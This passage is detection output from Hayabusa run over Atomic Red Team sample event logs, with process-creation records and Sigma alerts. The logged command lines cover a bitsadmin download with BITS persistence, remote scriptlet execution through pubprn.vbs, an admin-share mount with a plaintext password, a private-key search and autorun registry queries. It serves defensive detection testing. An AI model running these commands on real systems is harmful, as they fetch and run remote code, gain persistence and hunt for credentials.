https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1 : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,medium,Bitsadmin Download,,rules/sigma/process_creation/win_process_creation_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:05.365 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:30.640 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:30.660 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /create AtomicBITS : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,medium,Monitoring For Persistence Via BITS,,rules/sigma/process_creation/win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1 : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md 
C:\Windows\Temp\bitsadmin_flag.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Bitsadmin Download,,rules/sigma/process_creation/win_process_creation_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Monitoring For Persistence Via BITS,,rules/sigma/process_creation/win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:30.900 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:30.917 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1 : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:31.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS"" : Path: C:\Windows\System32\cmd.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:31.041 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /complete AtomicBITS : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:31.134 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:31.157 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /resume AtomicBITS : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:31.240 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:36.834 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b 
C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:36.882 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:37.264 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:41.050 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 
-2019-07-19 23:48:41.085 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator : Path: C:\Windows\System32\net.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,medium,Mounted Windows Admin Shares with net.exe,,rules/sigma/process_creation/win_net_use_admin_share.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:46.238 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:57.466 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""echo "" ""ATOMICREDTEAM > %%windir%%\cert.key"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 
23:48:57.524 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,medium,Discover Private Keys,,rules/sigma/process_creation/process_creation_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /S /D /c"" dir c:\ /b /s .key "" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,medium,Discover Private Keys,,rules/sigma/process_creation/process_creation_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: findstr /e .key : Path: C:\Windows\System32\findstr.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,medium,Discover Private 
Keys,,rules/sigma/process_creation/process_creation_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:31.690 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.150 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.227 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.304 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,low,Query 
Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.389 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.463 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : 
Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.551 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.660 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.728 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,low,Query 
Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.789 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.850 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad : Path: 
